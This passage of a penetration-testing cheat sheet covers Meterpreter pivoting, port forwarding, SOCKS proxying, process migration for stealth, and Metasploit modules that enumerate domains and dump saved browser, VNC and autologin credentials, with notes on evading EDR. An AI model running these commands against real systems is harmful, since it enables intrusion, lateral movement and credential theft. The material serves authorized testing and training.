    612 > 2. Supports SOCKS4, SOCKS5, and HTTP proxies
    613 > 3. Dynamic or strict proxy chain modes
    614 > 4. Essential for pivoting through compromised hosts
    615 
    616 ### Core Pivoting Commands
    617 
    618 ```bash
    619 run autoroute -h              # Add routes through Meterpreter session
    620 run autoroute -s <subnet>     # Add subnet route
    621 portfwd -h                    # Port forwarding help
    622 portfwd add -l <local_port> -p <target_port> -r <target_IP>   # Forward port
    623 portfwd list                  # List active forwards
    624 portfwd delete -l <local_port>   # Remove forward
    625 ```
    626 
    627 > **Note —** + Command Breakdown
    628 > 1. **autoroute -s <subnet/CIDR>**: Route network traffic through [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    629 > 2. **portfwd add -L <bind_IP>**: Specify local bind IP for port forwarding
    630 > 3. **portfwd -R**: Reverse port forward (target to attacker; less common)
    631 > 4. **autoroute -p**: Display all configured routes and associated sessions
    632 > 5. *Always verify target network interfaces with `ipconfig`/`ifconfig` before adding routes*
    633 
    634 ### Pivoting Workflow
    635 
    636 ```bash
    637 # View target network interfaces
    638 ipconfig   # Windows
    639 ifconfig   # Linux
    640 
    641 # Add route to internal subnet
    642 run autoroute -s 10.10.10.0/24
    643 
    644 # Verify route added
    645 run autoroute -p
    646 
    647 # Forward RDP port from internal host
    648 portfwd add -l 3389 -p 3389 -r 10.10.10.50
    649 
    650 # Access via localhost
    651 xfreerdp /v:127.0.0.1 /u:admin
    652 
    653 # Set up SOCKS proxy for full pivoting
    654 background
    655 use auxiliary/server/socks_proxy
    656 set SRVHOST 127.0.0.1
    657 set SRVPORT 1080
    658 set VERSION 4a
    659 run -j
    660 
    661 # Configure proxychains and scan internal network
    662 # Edit /etc/proxychains4.conf: socks4 127.0.0.1 1080
    663 proxychains nmap -sT -Pn 10.10.10.0/24
    664 ```
    665 
    666 > **Note —** + SOCKS Proxy Setup Breakdown
    667 > 1. **SRVHOST 127.0.0.1**: Bind proxy server to localhost
    668 > 2. **SRVPORT 1080**: Standard SOCKS port (configurable)
    669 > 3. **VERSION 4a**: SOCKS4a protocol with DNS proxying support
    670 > 4. **run -j**: Run as background job (non-blocking)
    671 > 5. *Configure [proxychains4.conf](https://github.com/haad/proxychains) with `socks4 127.0.0.1 1080` before use*
    672 
    673 ### Port Forwarding Techniques
    674 
    675 | Technique | Use Case | Command Pattern |
    676 |:---|:---|:---|
    677 | Local Port Forward | Access internal service via localhost | `portfwd add -l <local> -p <remote> -r <IP>` |
    678 | Reverse Port Forward | Expose attacker service to target network | `portfwd add -R -l <local> -p <remote> -L <IP>` |
    679 | SOCKS Proxy | Route all traffic through pivot | `auxiliary/server/socks_proxy` |
    680 | Dynamic Tunneling | SSH-style dynamic forwarding | Use with [proxychains](https://github.com/haad/proxychains) |
    681 
    682 > **Note —** + OPSEC and Detection Considerations
    683 > 1. Pivoting generates east-west (lateral) traffic—anomaly for workstations
    684 > 2. SOCKS proxy traffic encapsulated in [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session—inspect session traffic patterns
    685 > 3. Port forwards create listening sockets on attacker—egress firewall may block initial callback
    686 > 4. Large data transfers through pivot = bandwidth anomaly
    687 > 5. NetFlow/Zeek logs may reveal unusual internal connections
    688 > 6. Workstation-to-server traffic patterns differ from normal user behavior
    689 
    690 > **Note —** + Common Errors and Solutions
    691 > 1. **"Route addition failed"**: Subnet overlap or incorrect CIDR notation—verify with `autoroute -p`
    692 > 2. **Port forward fails**: Target port not open or host unreachable—verify with `ping`, `portscan` module
    693 > 3. **SOCKS proxy not working**: Check `proxychains.conf` syntax and SOCKS version (4a vs 5)
    694 > 4. **"Connection refused" on forwarded port**: Service not running on target or local port conflict
    695 > 5. **Slow pivot performance**: Network latency or bandwidth limitations—optimize traffic
    696 
    697 > **Note —** + Advanced Pivoting Techniques
    698 > 6. **Multi-hop pivoting**: Chain multiple compromised hosts for deep network access
    699 > 7. **DNS tunneling**: Exfiltrate data through DNS queries when other protocols blocked
    700 > 8. **SSH dynamic forwarding**: Alternative to SOCKS proxy using SSH `-D` flag
    701 > 9. **VPN setup**: Establish full network-layer access through compromised host
    702 > 10. **HTTP/HTTPS tunneling**: Bypass proxy restrictions using application-layer protocols
    703 
    704 ---
    705 
    706 ## Process Migration
    707 
    708 > **Note —** + Prerequisites
    709 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    710 > 2. Appropriate privileges (admin required for SYSTEM processes)
    711 > 3. Understanding of target process architecture (x86/x64)
    712 > 4. Knowledge of stable, long-running processes on target
    713 
    714 ### Core Migration Commands
    715 
    716 ```bash
    717 ps                            # List processes
    718 migrate <PID>                 # Migrate to target process
    719 getpid                        # Show current process ID
    720 ```
    721 
    722 > **Note —** + Command Breakdown
    723 > 1. **ps -S <name>**: Filter process list by name for quick identification
    724 > 2. **ps -A <arch>**: Filter by architecture (x86/x64) for compatibility
    725 > 3. **migrate <PID>**: Injects [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) payload into target process memory
    726 > 4. **getpid**: Verify current process ID before and after migration
    727 > 5. *Always migrate away from initial exploit process (often unstable or will close)*
    728 
    729 ### Migration Workflow
    730 
    731 ```bash
    732 # List processes
    733 ps
    734 
    735 # Find stable process (e.g., explorer.exe)
    736 ps -S explorer.exe
    737 
    738 # Migrate to explorer
    739 migrate 1234   # Use actual PID from ps output
    740 
    741 # Verify migration
    742 getpid
    743 
    744 # Migrate to x64 process if session is x86
    745 ps -A x64
    746 migrate 5678
    747 
    748 # For stealth, migrate to legitimate long-running process
    749 ps -S svchost.exe
    750 migrate 2468
    751 ```
    752 
    753 > **Note —** + Process Selection Criteria
    754 > 1. **Stability**: Long-running processes unlikely to terminate (explorer.exe, svchost.exe)
    755 > 2. **Architecture**: Match [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) architecture (x86/x64) to target process
    756 > 3. **Privilege level**: Match current privileges (user→user, SYSTEM→SYSTEM)
    757 > 4. **Stealth**: Legitimate system processes blend with normal operations
    758 > 5. **User context**: Same user session to avoid cross-session injection alerts
    759 
    760 ### Recommended Migration Targets
    761 
    762 | Process | Privilege | Stability | Stealth | Notes |
    763 |:---|:---|:---|:---|:---|
    764 | explorer.exe | User | High | High | User desktop process, always running |
    765 | svchost.exe | SYSTEM | High | Medium | Multiple instances, choose carefully |
    766 | spoolsv.exe | SYSTEM | High | Medium | Print spooler service |
    767 | winlogon.exe | SYSTEM | High | Low | Protected process on modern Windows |
    768 | lsass.exe | SYSTEM | High | Very Low | Protected, instant EDR alert |
    769 
    770 > **Note —** + OPSEC and Detection Considerations
    771 > 1. Migration = process injection (CreateRemoteThread, WriteProcessMemory)—EDR signatures exist
    772 > 2. Migrating to security product process (AV, EDR agent) = instant detection/crash
    773 > 3. Injecting across session boundaries (different user) requires SeDebugPrivilege
    774 > 4. Memory forensics: Injected code lacks corresponding image file—indicator of compromise
    775 > 5. Prefer processes with same privilege level and architecture as current session
    776 > 6. API call patterns (OpenProcess→VirtualAllocEx→WriteProcessMemory→CreateRemoteThread) heavily monitored
    777 
    778 > **Note —** + Common Errors and Solutions
    779 > 1. **"Migration failed"**: Target process protected, wrong architecture, or insufficient privileges
    780 > 2. **Session dies after migration**: Target process crashed or terminated—choose stable process
    781 > 3. **"Access is denied"**: Need SYSTEM to migrate into SYSTEM processes—run `getsystem` first
    782 > 4. **Architecture mismatch**: Migrating x86→x64 or vice versa fails—match architectures
    783 > 5. **Process protected**: Windows 10+ protects certain processes (PPL, ELAM)—choose alternative
    784 
    785 > **Note —** + Migration Best Practices
    786 > 6. Migrate immediately after exploitation to stable process
    787 > 7. Avoid security software processes (will crash session)
    788 > 8. Match architecture to maximize command compatibility
    789 > 9. Choose processes with multiple instances (svchost.exe) for better hiding
    790 > 10. For credential dumping, migrate to same session as target user
    791 > 11. Document original PID for forensic cleanup and incident response
    792 
    793 ---
    794 
    795 ## Post-Exploitation Modules
    796 
    797 > **Note —** + Prerequisites
    798 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    799 > 2. Background session to run modules from msfconsole
    800 > 3. Appropriate privileges for target module functionality
    801 > 4. Understanding of target environment ([Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview), workgroup, domain-joined)
    802 
    803 ### Enumeration Modules
    804 
    805 ```bash
    806 # Enumeration
    807 background
    808 use post/windows/gather/enum_domain                # Enumerate AD domain info
    809 use post/windows/gather/enum_shares                # Enumerate network shares
    810 use post/windows/gather/enum_applications          # List installed software
    811 use post/windows/gather/enum_logged_on_users       # Active user sessions
    812 use post/windows/gather/enum_patches               # Installed patches/KBs
    813 
    814 # Set session and run
    815 set SESSION 1
    816 run
    817 ```
    818 
    819 > **Note —** + Enumeration Module Breakdown
    820 > 1. **enum_domain**: Queries [Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) for domain controllers, users, groups, trust relationships
    821 > 2. **enum_shares**: Discovers [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) shares on network (potential lateral movement targets)
    822 > 3. **enum_applications**: Lists installed software with versions (vulnerability research)
    823 > 4. **enum_logged_on_users**: Identifies active sessions (credential harvesting targets)
    824 > 5. **enum_patches**: Cross-references missing KBs with exploit database
    825 > 6. *Modules save results to Metasploit loot/credentials database—access with `loot`, `creds` commands*
    826 
    827 ### Credential Gathering Modules
    828 
    829 ```bash
    830 # Credential gathering
    831 use post/windows/gather/credentials/windows_autologin   # Auto-login creds
    832 use post/windows/gather/credentials/credential_collector
    833 use post/multi/gather/firefox_creds                    # Browser credentials
    834 use post/windows/gather/credentials/vnc                # VNC passwords
    835 
    836 # Set session and run
    837 set SESSION 1
    838 run
    839 ```
    840 
    841 > **Note —** + Credential Module Breakdown
    842 > 1. **windows_autologin**: Extracts plaintext credentials from registry (auto-logon feature)
    843 > 2. **credential_collector**: Aggregates credentials from multiple sources (registry, files, memory)
    844 > 3. **firefox_creds**: Decrypts saved [Firefox](https://www.mozilla.org/firefox/) passwords from profile
    845 > 4. **vnc**: Extracts [VNC](https://www.realvnc.com/) passwords from registry (weak encryption)
    846 
    847 ### Network Enumeration Modules
    848 
    849 ```bash
    850 # Network
    851 use post/multi/gather/ping_sweep                   # Ping sweep internal network
    852 use post/windows/gather/arp_scanner                # ARP scan
    853 use post/windows/gather/enum_domain_computers      # List domain computers
    854 
    855 # Set session and run
    856 set SESSION 1
    857 set RHOSTS 10.10.10.0/24   # For network modules
    858 run
    859 ```
    860 
    861 > **Note —** + Network Module Breakdown
    862 > 1. **ping_sweep**: ICMP echo requests to discover live hosts on internal subnet
    863 > 2. **arp_scanner**: Examines ARP cache and performs ARP scans (Layer 2 discovery)
    864 > 3. **enum_domain_computers**: Queries [Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) for all domain-joined computers
    865 > 4. *Network scans generate traffic patterns detectable by NIDS/NIPS*
    866 
    867 ### Practical Module Examples
    868 
    869 ```bash
    870 # Enumerate domain
    871 background
    872 use post/windows/gather/enum_domain
    873 set SESSION 1
    874 run
    875 
    876 # Find network shares
    877 use post/windows/gather/enum_shares
    878 set SESSION 1
    879 run
    880 
    881 # Check installed patches
    882 use post/windows/gather/enum_patches
    883 set SESSION 1
    884 run
    885 
    886 # Discover live hosts on internal network
    887 use post/multi/gather/ping_sweep
    888 set SESSION 1
    889 set RHOSTS 10.10.10.0/24
    890 run
    891 
    892 # Dump saved browser credentials
    893 use post/multi/gather/firefox_creds
    894 set SESSION 1
    895 run
    896 ```
    897 
    898 > **Note —** + Module Output and Database Integration
    899 > 1. **loot command**: View all collected files and data from post modules
    900 > 2. **creds command**: Display extracted credentials from all sources
    901 > 3. **hosts command**: Show discovered hosts from network enumeration
    902 > 4. **services command**: List identified services on enumerated hosts
    903 > 5. *All module results automatically saved to [Metasploit](https://www.metasploit.com/) database for analysis*
    904 
    905 ### Module Output Interpretation
    906 
    907 | Module Type | Key Information | Action Items |
    908 |:---|:---|:---|
    909 | Domain Enumeration | Domain controllers, trust relationships | Map AD infrastructure |
    910 | Share Enumeration | Writable shares, sensitive data | Lateral movement, exfiltration |
    911 | Patch Enumeration | Missing KBs | Privilege escalation exploits |
    912 | User Enumeration | Active sessions, admin users | Credential harvesting targets |
    913 | Network Discovery | Live hosts, open ports | Expand attack surface |
    914 
    915 > **Note —** + OPSEC and Detection Considerations
    916 > 1. Enumeration modules generate suspicious activity (LDAP queries, [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) enumeration, network scanning)
    917 > 2. Domain queries hit domain controller—logs at DC ([Event 4662](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662), [4624](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624))
    918 > 3. Share enumeration = [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) traffic spike—NetBIOS/SMB anomaly detection
    919 > 4. Ping sweeps = ICMP flood or rapid connection attempts—NIDS/NIPS alerts
    920 > 5. Spread activity over time to blend with normal traffic
    921 > 6. Consider using native Windows tools ([PowerShell](https://learn.microsoft.com/en-us/powershell/), net commands) for stealthier enumeration
    922 
    923 > **Note —** + Common Errors and Solutions
    924 > 1. **"No results returned"**: Insufficient privileges or target not domain-joined—verify with `getuid`
    925 > 2. **Module hangs**: Network timeout—adjust `set TIMEOUT` value in module options
    926 > 3. **"Session not valid"**: Session died during module run—check session stability with `sessions -l`
    927 > 4. **Database not initialized**: Run `msfdb init` to set up [PostgreSQL](https://www.postgresql.org/) database
    928 > 5. **Empty loot output**: Module failed silently—check msfconsole logs for errors
    929 
    930 > **Note —** + Post-Exploitation Module Workflow
    931 > 6. Start with system enumeration (`enum_domain`, `enum_patches`)
    932 > 7. Gather credentials from all sources (`credential_collector`, browser modules)
    933 > 8. Enumerate network (`ping_sweep`, `arp_scanner`)
    934 > 9. Identify lateral movement targets (`enum_shares`, `enum_domain_computers`)
    935 > 10. Document all findings in engagement notes for reporting
    936 
    937 ---
    938 
    939 ## Final OPSEC Reminders
    940 
    941 > **Note —** + Critical Security Considerations
    942 > 1. [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) = known malware; mature EDR will detect/block without evasion
    943 > 2. Consider custom payloads, obfuscation, or C2 frameworks ([Cobalt Strike](https://www.cobaltstrike.com/), [Covenant](https://github.com/cobbr/Covenant), [Sliver](https://github.com/BishopFox/sliver)) for real-world ops
    944 > 3. Always operate within authorized scope; maintain detailed logs and IOC lists for remediation
    945 > 4. Test payloads in isolated lab before production engagement
    946 > 5. Have out-of-band C2 backup if primary session burned
    947 
    948 > **Note —** + Engagement Best Practices
    949 > 6. Document all IOCs (files, registry keys, services, scheduled tasks) for client remediation
    950 > 7. Maintain communication with client point of contact during testing
    951 > 8. Have emergency stop procedures if production systems affected
    952 > 9. Use encryption for exfiltrated data to protect client confidentiality
    953 > 10. Provide comprehensive cleanup scripts and remediation guidance in final report
    954 
    955 ---
    956 
    957 ## References
    958 
    959 1. [Offensive Security Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)
    960 2. [Rapid7 Metasploit Framework Documentation](https://docs.rapid7.com/metasploit/)
    961 3. [Gentilkiwi Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz)
    962 4. [MITRE ATT&CK Framework](https://attack.mitre.org/)
    963 5. [HackTricks - Pentesting Methodology](https://book.hacktricks.xyz/)
    964 6. [Microsoft Windows Security Documentation](https://learn.microsoft.com/en-us/windows/security/)
    965 7. [Offensive Security OSCP Study Guide](https://www.offensive-security.com/pwk-oscp/)
    966 8. [SANS Penetration Testing Resources](https://www.sans.org/cyber-security-courses/penetration-testing/)
    967 
    968 #Metasploit #Meterpreter #Post-Exploitation #Credential-Dumping #Pivoting #Windows #Penetration-Testing #Red-Team #Kiwi #Mimikatz #Process-Migration #Privilege-Escalation #Persistence #OPSEC